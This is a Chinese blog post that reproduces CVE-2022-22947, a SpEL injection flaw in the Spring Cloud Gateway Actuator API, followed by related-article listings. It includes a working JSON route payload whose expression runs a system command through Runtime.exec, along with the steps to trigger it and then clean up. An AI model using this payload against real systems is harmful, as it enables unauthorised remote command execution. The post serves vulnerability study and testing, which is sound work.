漏洞复现----42、Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

已于 2022-06-30 15:25:19 修改
阅读量1.1k 收藏
点赞数
分类专栏: 网络安全技术 # 漏洞复现 文章标签: CVE-2022-22947 SpEL表达式注入
于 2022-06-30 15:23:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/125535918
版权

文章目录

Spring Cloud Gateway

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,ShortcutConfigurable 接口getValue()中使用了 StandardEvaluationContext 类来执行 SpEL 表达式,当攻击者可以访问Actuator API的情况下,可以利用该漏洞执行任意命令。

漏洞版本

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
旧的、不受支持的版本也会受到影响

漏洞复现

1、IP:端口,抓包修改请求包,构造包含恶意SpEL表达式的路由

在这里插入图片描述

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

id:指定新路由的名称,必须全局唯一;
filters:字段给这条路由指定若干个过滤器。过滤器用于对请求和响应进行修改;
name:字段指定要添加的过滤器,这里添加了一个 AddResponseHeader 过滤器,用于 gateway 给客户端返回响应之前添加一个响应头;
args.name:字段指定要添加的响应头;
args.value:字段指定响应头的值。这里的值是要执行的 SpEL 表达式,用于执行 id 命令。注意需要将命令输出结尾的换行符去掉,否则过滤器执行时会抛出异常说「响应头的值不能以 \r 或 \n 结尾」;
uri:字段指定将客户端请求转发到 http://example.com。

2、刷新网关,触发SpEL表达式执行

在这里插入图片描述

3、查看SpEL表达式执行结果

在这里插入图片描述

4、删除所添加的路由

在这里插入图片描述

5、刷新路由

在这里插入图片描述

七天啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SpringCloudGateway远程代码执行CVE-2022-22947
m0_57379855的博客
03-12 1444
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
Spring Cloud gateway 三种方式注入内存马(详细过程)
pyth0zn的博客
04-19 877
1.提交请求包的时候一定要注意类路径要写正确,我有好几次不成功都是没写对2.最好用java 1.8 编译字节码,兼容性比较好,不然会出现服务器版本和本地编译不一致的情况CVE-2022-22947 注入哥斯拉内存马 – Whwlsfb's Tech BlogSpring Cloud Gateway 注入哥斯拉内存马复现 - 国产大熊猫个人空间 - OSCHINA - 中文开源技术交流社区Spring cloud gateway通过SPEL注入内存马 | 回忆飘如雪。
[CVE-2022-22947]Spring Cloud Gateway Actuator API SpEL表达式注入命令执行
whoami
03-03 4571
一、背景 Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 二、漏洞分析 ShortcutConfigurable.java : static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory, String entryValu..
【Java代码审计】SpEL表达式之命令执行
最新发布
qq_48201589的博客
02-20 1001
Spring表达式语言全称为“Spring Expression Language”,缩写为“SpEL”。由Spring 3开始引入。不正确的使用SpEL表达式,则会导致命令执行漏洞
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
1.漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。 2.影响版本 3.1.0 3.0.0至3.0.6 Spring Cloud Gateway 其他已不再更新的版本
Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)
yang1234567898的博客
04-25 3290
概念: 什么是spring cloudSpring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
00勇士王子的博客
03-23 476
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
Spring SpEL表达式的使用
热门推荐
骑个小蜗牛的博客
05-01 1万+
一、SpEL介绍 二、SpEL用法 1. 在@Value注解中使用 2. 在XML配置中使用 3. 在代码中创建Expression对象 三、SpEL原理 1. 解析器:ExpressionParser 2. 表达式:Expression 3. 上下文:EvaluationContext 使用流程 四、表达式语法 1. 基本表达式 ① 字面量表达式 ② 算数运算表达式 ③ 关系运算表达式 ④ 逻辑运算表达式 ⑤ 字符串连接及截取表达式 ⑥ 三目运算 ⑦ Elivis表达式 ⑧ 正则表达式 2. 类相关表达式
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
qq_43381463的博客
04-19 432
Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令
CVE-2022-22947 SpringCloud Gateway 远程命令执行漏洞
dust_hk的博客
03-07 6331
CVE-2022-22947 SPRINGCLOUD GATEWAY SPEL RCE 摘要 Spring Cloud Gateway的商业产品是分布式API网关,用于路由HTTP请求并处理跨领域问题,如单点登录(SSO),速率限制,访问控制。借助Spring Cloud Gateway forKubernetes,运营商可以专注于管理和监控其目标环境中的API网关,而应用程序开发人员可以专注于API的公开方式,并应用适当的设计和跨领域问题。 在 3.1.1+ 和 3.0.7+ 之前的 spring clo
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
spring-actuator-example:Spring Boot 2.0执行器示例
05-18
java -jar target/spring-actuator-example-1.0.0.jar 您应该注意到该应用程序正在启动, . ____ _ __ _ _ /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \ ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \ \\/ ___)| |_)|...
express-cloudfoundry-actuator-middleware:用于Cloud Foundry应用程序的ExpressJS执行器中间件
05-09
express-cloudfoundry-actuator-中间件 用于NodeJS Cloud Foundry应用程序的ExpressJS执行器中间件。 当前为Cloud Foundry Apps Manager提供运行状况和信息端点。 这两个和将来的端点仅限于那些目前已登录到Apps ...
Spring-Boot-Gradle-Spring-Cloud-Microservice:带有Spring Boot和Spring Cloud的应用程序软件(MICROSERVICE)
02-04
11集成开发环境IntelliJ IDEA数据库使用H2Databse,MySQL等客户休息邮递员,失眠,Talend API测试器等用法$ git clone https://github.com/DanielArturoAlejoAlvarez/Spring-Boot-Gradle-Spring-Cloud-Microservice.
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861)
七天
11-25 4236
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
漏洞复现----13、Apache Flink 文件上传漏洞 (CVE-2020-17518)
七天
11-09 3120
文章目录一、Apache Flink简介二、漏洞简介三、漏洞复现四、上传jar包getshell 一、Apache Flink简介 Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但
漏洞复现----11、GlassFish任意文件读取
七天
11-10 3033
文章目录一、Glassfish简介二、漏洞简介 一、Glassfish简介 GlassFish是一款java编写的跨平台的开源的应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。Glassfish是Oracle 开发的官方Java EE容器,也是同时支持Servlet和EJB,支持最新的特性,有自己的web容器,支持集群,支持热部署。 二、漏洞简介 GlassFish容器解析了java语言中的特殊字符导致漏洞的产生。此漏洞严格来说是Glassf
漏洞复现----12、Apache Flink目录穿越漏洞CVE-2020-17519 )
七天
11-10 2874
文章目录一、漏洞简介二、漏洞复现 一、漏洞简介 Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。 影响版本: 1.11.0、1.11.1、1.11.2 二、漏洞复现 Payload: 192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f
cve-2022-22947漏洞原理
07-29
根据引用\[1\]和引用\[2\]的信息,CVE-2022-22947漏洞Spring Cloud Gateway中的一处命令注入漏洞。攻击者可以通过利用此漏洞执行SpEL表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。具体来说,当使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

七天啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值